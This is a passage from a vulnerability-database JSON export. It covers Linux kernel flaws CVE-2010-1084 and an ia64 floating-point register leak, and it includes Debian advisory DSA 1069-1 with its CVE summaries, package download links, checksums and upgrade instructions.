        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1173"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1187"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1437"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-22lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://packages.debian.org/\u003cpkg\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-22lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "BID",
        "id": "38898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "98412"
      },
      {
        "db": "PACKETSTORM",
        "id": "89938"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "db": "BID",
        "id": "38898"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "db": "PACKETSTORM",
        "id": "98412"
      },
      {
        "db": "PACKETSTORM",
        "id": "89938"
      },
      {
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-04-06T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "date": "2010-03-21T00:00:00",
        "db": "BID",
        "id": "38898"
      },
      {
        "date": "2010-09-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "date": "2011-02-11T13:13:00",
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "date": "2010-06-04T04:28:39",
        "db": "PACKETSTORM",
        "id": "90264"
      },
      {
        "date": "2011-02-11T03:35:21",
        "db": "PACKETSTORM",
        "id": "98412"
      },
      {
        "date": "2010-05-25T08:14:44",
        "db": "PACKETSTORM",
        "id": "89938"
      },
      {
        "date": "2010-06-04T23:01:06",
        "db": "PACKETSTORM",
        "id": "90307"
      },
      {
        "date": "2010-05-26T05:07:56",
        "db": "PACKETSTORM",
        "id": "89939"
      },
      {
        "date": "2010-04-06T22:30:00.530000",
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "date": "2010-04-06T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-10-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-1084"
      },
      {
        "date": "2013-06-24T11:30:00",
        "db": "BID",
        "id": "38898"
      },
      {
        "date": "2011-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      },
      {
        "date": "2023-11-07T02:05:14.207000",
        "db": "NVD",
        "id": "CVE-2010-1084"
      },
      {
        "date": "2010-04-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel of  Bluetooth Service disruption in sockets  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001934"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer overflow",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201004-087"
      }
    ],
    "trust": 0.6
  }
}

var-200407-0196
Vulnerability from variot

Floating point information leak in the context switch code for Linux 2.4.x only checks the MFH bit but does not verify the FPH owner, which allows local users to read register values of other processes by setting the MFH bit. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ Linux In the kernel, context switch code is used to switch computation processing between threads. Also, ia64 In architecture, FPH ( High-order register of floating point register ) Change information to user mask (UM) In the register MFH Store in register. this FPH If the register is changed, MFH A bit is set in the register. Local attackers who exploit this issue MFH It is possible to read the register values of other processes by creating a program that sets the bits. Also, ia64 In architecture Linux Kernel 2.4.x In certain circumstances, a local attacker could cause a kernel panic, resulting in a system out of service (CAN-2004-0447) Has been reported, but it is unknown at present. still, ia64 Other architectures are not affected by these issues.Please refer to the “Overview” for the impact of this vulnerability. The Linux kernel is reported prone to a data-disclosure vulnerability. Reportedly, this issue may permit a malicious executable to access the contents of floating-point registers that belong to another process. Linux is an open source operating system. Opened by (Arun Sharma) on 2004-05-28 17:46

Description of problem:

Linux 2.4.x and the SLES9/ia64 kernels have a floating point leak.

Version-Release number of selected component (if applicable):

2.4.21-12.EL.

How reproducible:

Run N (= number of cpus) copies of the program secret and one copy of the program check. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA 1069-1 security@debian.org http://www.debian.org/security/ Martin Schulze, Dann Frazier May 20th, 2006 http://www.debian.org/security/faq


Package : kernel-source-2.4.18,kernel-image-2.4.18-1-alpha,kernel-image-2.4.18-1-i386,kernel-image-2.4.18-hppa,kernel-image-2.4.18-powerpc-xfs,kernel-patch-2.4.18-powerpc,kernel-patch-benh Vulnerability : several Problem-Type : local/remote Debian-specific: no CVE IDs : CVE-2004-0427 CVE-2005-0489 CVE-2004-0394 CVE-2004-0447 CVE-2004-0554 CVE-2004-0565 CVE-2004-0685 CVE-2005-0001 CVE-2004-0883 CVE-2004-0949 CVE-2004-1016 CVE-2004-1333 CVE-2004-0997 CVE-2004-1335 CVE-2004-1017 CVE-2005-0124 CVE-2005-0528 CVE-2003-0984 CVE-2004-1070 CVE-2004-1071 CVE-2004-1072 CVE-2004-1073 CVE-2004-1074 CVE-2004-0138 CVE-2004-1068 CVE-2004-1234 CVE-2005-0003 CVE-2004-1235 CVE-2005-0504 CVE-2005-0384 CVE-2005-0135

Several local and remote vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2004-0427

 A local denial of service vulnerability in do_fork() has been found.

CVE-2005-0489

 A local denial of service vulnerability in proc memory handling has
 been found.

CVE-2004-0394

 A buffer overflow in the panic handling code has been found.

CVE-2004-0447

 A local denial of service vulnerability through a null pointer
 dereference in the IA64 process handling code has been found.

CVE-2004-0554

 A local denial of service vulnerability through an infinite loop in
 the signal handler code has been found.

CVE-2004-0685

 Unsafe use of copy_to_user in USB drivers may disclose sensitive
 information.

CVE-2005-0001

 A race condition in the i386 page fault handler may allow privilege
 escalation.

CVE-2004-0883

 Multiple vulnerabilities in the SMB filesystem code may allow denial
 of service of information disclosure.

CVE-2004-0949

 An information leak discovered in the SMB filesystem code.

CVE-2004-1016

 A local denial of service vulnerability has been found in the SCM layer.

CVE-2004-1333

 An integer overflow in the terminal code may allow a local denial of
 service vulnerability.

CVE-2004-0997

 A local privilege escalation in the MIPS assembly code has been found.

CVE-2004-1335

 A memory leak in the ip_options_get() function may lead to denial of
 service.

CVE-2004-1017

 Multiple overflows exist in the io_edgeport driver which might be usable
 as a denial of service attack vector.

CVE-2005-0124

 Bryan Fulton reported a bounds checking bug in the coda_pioctl function
 which may allow local users to execute arbitrary code or trigger a denial
 of service attack.

CVE-2005-0528

 A local privilege escalation in the mremap function has been found

CVE-2003-0984

 Inproper initialization of the RTC may disclose information.

CVE-2004-1070

 Insufficient input sanitising in the load_elf_binary() function may
 lead to privilege escalation.

CVE-2004-1071

 Incorrect error handling in the binfmt_elf loader may lead to privilege
 escalation.

CVE-2004-1072

 A buffer overflow in the binfmt_elf loader may lead to privilege
 escalation or denial of service.

CVE-2004-1073

 The open_exec function may disclose information.

CVE-2004-1074

 The binfmt code is vulnerable to denial of service through malformed
 a.out binaries.

CVE-2004-0138

 A denial of service vulnerability in the ELF loader has been found.

CVE-2004-1068

 A programming error in the unix_dgram_recvmsg() function may lead to
 privilege escalation.

CVE-2004-1234

 The ELF loader is vulnerable to denial of service through malformed
 binaries.

CVE-2005-0003

 Crafted ELF binaries may lead to privilege escalation, due to 
 insufficient checking of overlapping memory regions.

CVE-2004-1235

 A race condition in the load_elf_library() and binfmt_aout() functions
 may allow privilege escalation.

CVE-2005-0504

 An integer overflow in the Moxa driver may lead to privilege escalation.

CVE-2005-0384

 A remote denial of service vulnerability has been found in the PPP
 driver.

The following matrix explains which kernel version for which architecture fix the problems mentioned above:

                                 Debian 3.0 (woody)
 Source                          2.4.18-14.4
 Alpha architecture              2.4.18-15woody1
 Intel IA-32 architecture        2.4.18-13.2
 HP Precision architecture       62.4 
 PowerPC architecture            2.4.18-1woody6
 PowerPC architecture/XFS        20020329woody1            
 PowerPC architecture/benh       20020304woody1
 Sun Sparc architecture          22woody1

We recommend that you upgrade your kernel package immediately and reboot the machine.

Upgrade Instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get dist-upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody


These files will probably be moved into the stable distribution on its next update.


For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEb9YGXm3vHE4uyloRAkhXAJ0e1RmUxVZSbQICFa/j07oKPfWRVwCeMrhj wYGegwosZg6xi3oI77opLQY= =eu/T -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .

Debian GNU/Linux 3.0 alias woody


Source archives:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.dsc
  Size/MD5 checksum:      692 27f44a0eec5837b0b01d26c6cff392be
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-sparc-2.4_26woody1.tar.gz
  Size/MD5 checksum:    27768 6c719a6343c9ea0dad44a736b3842504
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.dsc
  Size/MD5 checksum:      792 d7c89c90fad77944ca1c5a18327f31dd
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5.tar.gz
  Size/MD5 checksum:  1013866 21b4b677a7a319442c8fe8a4c72eb4c2
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.dsc
  Size/MD5 checksum:      672 4c353db091e8edc4395e46cf8d39ec42
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3.diff.gz
  Size/MD5 checksum:    71071 7012adde9ba9a573e1be66f0d258721a
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19.orig.tar.gz
  Size/MD5 checksum: 32000211 237896fbb45ae652cc9c5cecc9b746da

Architecture independent components:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.18-sparc_22woody1_all.deb
  Size/MD5 checksum:  1521850 75d23c7c54094b1d25d3b708fd644407
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-headers-2.4.19-sparc_26woody1_all.deb
  Size/MD5 checksum:  1547874 c6881b25e3a5967e0f6f9c351fb88962
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-patch-2.4.19-mips_2.4.19-0.020911.1.woody5_all.deb
  Size/MD5 checksum:  1014564 0e89364c2816f5f4519256a8ea367ab6
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-doc-2.4.19_2.4.19-4.woody3_all.deb
  Size/MD5 checksum:  1785490 c66cef9e87d9a89caeee02af31e3c96d
http://security.debian.org/pool/updates/main/k/kernel-source-2.4.19/kernel-source-2.4.19_2.4.19-4.woody3_all.deb
  Size/MD5 checksum: 25902158 321403201a198371fd55c9b8ac4583f7

Sun Sparc architecture:

http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u_22woody1_sparc.deb
  Size/MD5 checksum:  3923058 db7bbd997410667bec4ac713d81d60ea
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.18-sun4u-smp_22woody1_sparc.deb
  Size/MD5 checksum:  4044796 106fcb86485531d96b4fdada61b71405
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u_26woody1_sparc.deb
  Size/MD5 checksum:  3831424 347b0c290989f0cc99f3b336c156f61d
http://security.debian.org/pool/updates/main/k/kernel-image-sparc-2.4/kernel-image-2.4.19-sun4u-smp_26woody1_sparc.deb
  Size/MD5 checksum:  3952220 f7dd8326c0ae0b0dee7c46e24023d0a2

Big endian MIPS architecture:

http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-headers-2.4.19_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  3890804 7348a8cd3961190aa2a19f562c96fe2f
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r4k-ip22_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  2080618 d52d00e7097ae0c8f4ccb6f34656361d
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/kernel-image-2.4.19-r5k-ip22_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:  2080830 db7141d3c0d86a43659176f974599cc2
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.19-mips/mips-tools_2.4.19-0.020911.1.woody5_mips.deb
  Size/MD5 checksum:    15816 c31e3b72d6eac6f3f99f75ea838e0bf9

These files will probably be moved into the stable distribution on its next update

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200407-0196",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "trustix",
        "version": "2.1"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "gentoo",
        "version": "*"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "trustix",
        "version": "2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.0"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.1"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "secure enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "enterprise linux ws ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux as ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "advanced workstation for the itanium processor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "10.0"
      },
      {
        "model": "linux mandrake amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.2"
      },
      {
        "model": "linux mandrake",
